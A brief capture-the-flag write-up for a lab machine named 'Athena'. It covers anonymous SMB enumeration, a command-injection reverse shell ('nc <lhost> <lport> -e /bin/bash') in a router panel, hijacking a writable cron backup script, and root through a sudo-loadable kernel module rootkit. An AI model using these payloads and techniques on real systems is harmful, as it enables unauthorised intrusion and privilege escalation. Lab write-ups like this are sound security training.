279 words
1 minutes
Athena
Nmap Scan
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
139/tcp open netbios-ssn syn-ack ttl 63
445/tcp open microsoft-ds syn-ack ttl 63
Initial Access
On port 80 => there is a web page.
SMB has anonymous login there will be a file containg a hidden direcotory in the web page.
/myrouterpanel
> smbclient \\\\$VMIP\\public
Password for [WORKGROUP\trevohack]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Apr 17 06:24:43 2023
.. D 0 Mon Apr 17 06:24:05 2023
msg_for_administrator.txt N 253 Mon Apr 17 00:29:44 2023
19947120 blocks of size 1024. 9693196 blocks available
smb: \> get msg_for_administrator.txt
getting file \msg_for_administrator.txt of size 253 as msg_for_administrator.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \>
/myrouterpanel
is vulnerable to RCE$(nc <lhost> <lport> -e /bin/bash)
will get a reverse shell aswww-data
Privilege Escalation to Athena
From there, a
backup.sh
file is available at/usr/share/backup
which runs recursively if you look atpspy
.ls -la
shows this
-rwxr-xr-x 1 www-data athena 310 Sep 16 19:01 backup.sh
- Injecting a reverse shell may give a shell as
athena
> nc -nvlp 9090
Listening on 0.0.0.0 9090
Connection received on 10.10.236.162 41090
bash: no job control in this shell
athena@routerpanel:/$ whoami
athena
Priv Escalate to root
- On athena
sudo -l -l
reveals that/mnt/.../secret/venom.ko
can be loaded to the kernel
athena@routerpanel:/$ sudo -l -l
Matching Defaults entries for athena on routerpanel:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User athena may run the following commands on routerpanel:
Sudoers entry:
RunAsUsers: root
Options: !authenticate
Commands:
/usr/sbin/insmod /mnt/.../secret/venom.ko
- USE Ghidra: to reverse the venom.ko file
- After reversing, the
give_root
function may work like thiskill -57 <pid>
, later on theid
command reveals that you have root access.